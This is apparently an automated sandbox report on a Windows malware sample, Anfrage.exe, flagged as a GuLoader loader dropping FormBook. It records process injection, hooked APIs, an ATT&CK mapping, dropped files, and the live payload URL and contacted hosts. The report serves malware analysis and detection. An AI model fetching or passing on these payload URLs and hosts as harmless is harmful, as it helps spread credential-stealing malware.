            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeProcess created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"Jump to behavior
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: mrdYGoZBmXi.exe, 00000008.00000002.2647181898.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000000.2402821903.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DE5

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		11
            Masquerading            		OS Credential Dumping1
            Query Registry            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts212
            Process Injection            		1
            Virtualization/Sandbox Evasion            		LSASS Memory221
            Security Software Discovery            		Remote Desktop Protocol1
            Clipboard Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		212
            Process Injection            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials23
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Anfrage.exe53%ReversingLabsWin32.Trojan.GuLoader
            Anfrage.exe100%AviraHEUR/AGEN.1361137

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binM0%Avira URL Cloudsafe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binI0%Avira URL Cloudsafe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.bin0%Avira URL Cloudsafe
            https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLeg0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            familytherapycenter.rs
            		188.40.95.144
            		truefalse
              		high
              7fh27o.vip
              		3.33.130.190
              		truetrue
                		unknown
                www.7fh27o.vip
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdAnfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                    		high
                    http://www.ftp.ftp://ftp.gopher.Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      		high
                      https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binIAnfrage.exe, 00000007.00000003.2389055505.0000000006298000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.000000000629A000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.0000000006298000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdAnfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorAnfrage.exe, Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://nsis.sf.net/NSIS_ErrorErrorAnfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                            		high
                            https://familytherapycenter.rs/Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLegAnfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binMAnfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                188.40.95.144
                                		familytherapycenter.rsGermany
                                		24940HETZNER-ASDEfalse
                                3.33.130.190
                                		7fh27o.vipUnited States
                                		8987AMAZONEXPANSIONGBtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1553562
                                Start date and time:2024-11-11 12:02:21 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 37s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Anfrage.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@5/10@2/2
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 94%
                                • Number of executed functions: 118
                                • Number of non-executed functions: 350
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target mrdYGoZBmXi.exe, PID 5252 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: Anfrage.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                188.40.95.144Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                                                Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    3.33.130.190seethebestthingsneedtodowithgreatthingshappenedonheretosee.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                    • www.starseedtechs.net/cga4/
                                                    PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                    • www.co2cartridges.net/clyj/
                                                    shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                    • www.loginov.enterprises/y0sc/
                                                    fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                    • www.mythkitchen.net/jpec/
                                                    New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.7fh27o.vip/9lti/
                                                    AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                    • www.dccf.earth/n41a/
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • www.bio-thymus.com/ezyn/
                                                    xBzBOQwywT.exeGet hashmaliciousFormBookBrowse
                                                    • www.doggieradio.net/szy7/
                                                    ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                    • www.optimallogics.services/xw8x/
                                                    Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                    • www.vincemachi.net/zg1y/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    familytherapycenter.rsAnfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    HETZNER-ASDEshindemips.elfGet hashmaliciousUnknownBrowse
                                                    • 144.79.204.133
                                                    5r3fqt67ew531has4231.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 188.40.247.90
                                                    1.cmdGet hashmaliciousUnknownBrowse
                                                    • 195.201.57.90
                                                    Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                    • 195.201.57.90
                                                    Exploit Detector LIST (2).batGet hashmaliciousUnknownBrowse
                                                    • 195.201.57.90
                                                    yde4cz.cmdGet hashmaliciousUnknownBrowse
                                                    • 195.201.57.90
                                                    PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                    • 78.47.21.153
                                                    https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwi2-r-EpciJAxVQ_8kDHavKJD4QFnoECBYQAQ&usg=AOvVaw0b8qPBQnhqFT1nkSOYsQHT&opi=89978449&url=amp%2Fnew.wowf.org.in%2Fphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F/Get hashmaliciousUnknownBrowse
                                                    • 49.12.80.157
                                                    https://geett10.z6.web.core.windows.net/werrx01USAHTML/?bcda=18338461279#Get hashmaliciousTechSupportScamBrowse
                                                    • 195.201.57.90
                                                    Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    AMAZONEXPANSIONGBseethebestthingsneedtodowithgreatthingshappenedonheretosee.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                    • 3.33.130.190
                                                    PO No-5100002069 Sr. No. 11 & PO No-5100002072 Sr. No. 8,10,17..exeGet hashmaliciousFormBookBrowse
                                                    • 3.33.130.190
                                                    GE AEROSPACE _WIRE REMITTANCE.xlsxGet hashmaliciousUnknownBrowse
                                                    • 52.223.1.163
                                                    shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                    • 3.33.130.190
                                                    fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                    • 3.33.130.190
                                                    New PO [FK4-7173].pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 3.33.130.190
                                                    http://jobs.sixlfags.comGet hashmaliciousUnknownBrowse
                                                    • 3.33.148.61
                                                    https://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                                                    • 3.33.220.150
                                                    Le55bnMCON.msiGet hashmaliciousAteraAgentBrowse
                                                    • 52.223.39.232
                                                    kTbv9ZA2x0.msiGet hashmaliciousAteraAgentBrowse
                                                    • 52.223.39.232

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    074c592b-5cc0-496d-b3fa-45a09d4363ce#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    rPO3799039985.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 188.40.95.144
                                                    Rechnung_10401.jsGet hashmaliciousScreenConnect ToolBrowse
                                                    • 188.40.95.144
                                                    A322mb7u3h.exeGet hashmaliciousUnknownBrowse
                                                    • 188.40.95.144
                                                    C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                    • 188.40.95.144
                                                    Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                    • 188.40.95.144
                                                    WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                    • 188.40.95.144
                                                    XOr3Kqyo9n.exeGet hashmaliciousStealcBrowse
                                                    • 188.40.95.144

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dllAnfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Anfrage244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                5112024976.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                  Anfrage24438.zipGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      Anfrage24438.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):11264
                                                                        Entropy (8bit):5.7711167426271945
                                                                        Encrypted:false
                                                                        SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                        MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                        SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                        SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                        SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Joe Sandbox View:
                                                                        • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                        • Filename: 5112024976.exe, Detection: malicious, Browse
                                                                        • Filename: 5112024976.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage24438.zip, Detection: malicious, Browse
                                                                        • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                                                        • Filename: Anfrage24438.exe, Detection: malicious, Browse
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\Lderbrynjens.Kug

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):297136
                                                                        Entropy (8bit):7.632126679137234
                                                                        Encrypted:false
                                                                        SSDEEP:6144:jbxbyYHPcCcEbP3ze4kNJ3q8rjqFxIDPuBnwd2v2a3:HxbwP8uJ66qF0PanDH
                                                                        MD5:4CD296B7BD907DC035E99052D2D2AA3D
                                                                        SHA1:AEC56F618689CD8FB2FFF4C8185B3EB6F57721BF
                                                                        SHA-256:3F58F2B58267E5D7C1AE5B442330D825E6AEF13F9D5EEFE57CB00B327FC1985C
                                                                        SHA-512:D571B90781CE3192122DDB01A30219E82D3CD643DC9E4729B75C2E087679F6364469771B2B8012AC2EE0A8DAE7375B58DC8B013E5354D98A19306A3E26700756
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.................f.....H.........555..........V....\............Y........O...........<<.......===.............TTT.........b..........................VV.%%%%%.....]]]]].........................................n...$............L...FF.l.X......3.K........@@.................................ll.........pppp......................#...k..+.............PP...*..._.W.).......P..............H.WWWW......................3..............ee....%%%%%........................'''.......................----....sss....AAAA.......B.....7....../...................................w......ZZ.....//...........(((.'''..d.W.....&&..III.....zzzzzz...].....nn.......................4........,,.....II............M.{..|....)))..........................................................................................---.............................................Z.I.....>........z..Q...ee.ggg...}.....7.kkk.........{...................................:.z..||||......Q........L...........................HH.V..................

                                                                        C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic\Multistable.For

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Anfrage.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):79507
                                                                        Entropy (8bit):4.599504703692736
                                                                        Encrypted:false
                                                                        SSDEEP:1536:XekPOcV6w7ih0z4+l77pFzfeSBYpXAMeYXFKf:XeQOG7dFzfeH6MKf
                                                                        MD5:1500C8A25FC49EBA0CD91C504A908DA4
                                                                        SHA1:D33C4DBD322078F9BBC0FAF5B3706B365FC1FEAD
                                                                        SHA-256:25C4FB45922AB379ED593E544E7DAD0C91F10C60752744C2DA6FA657B819ADD3
